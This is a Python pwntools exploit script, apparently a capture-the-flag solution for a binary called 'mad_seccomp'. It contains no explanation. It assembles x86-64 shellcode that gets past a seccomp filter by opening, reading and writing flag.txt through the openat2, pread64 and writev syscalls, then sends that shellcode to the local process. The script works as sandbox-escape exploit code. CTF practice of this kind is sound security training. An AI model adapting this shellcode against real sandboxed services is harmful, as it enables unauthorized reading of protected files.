#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()

# funcs
s = lambda a: r.send(a)

# shellcode
sc = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""
sc = asm(sc)
sc += b"flag.txt\0"
s(sc)

r.interactive()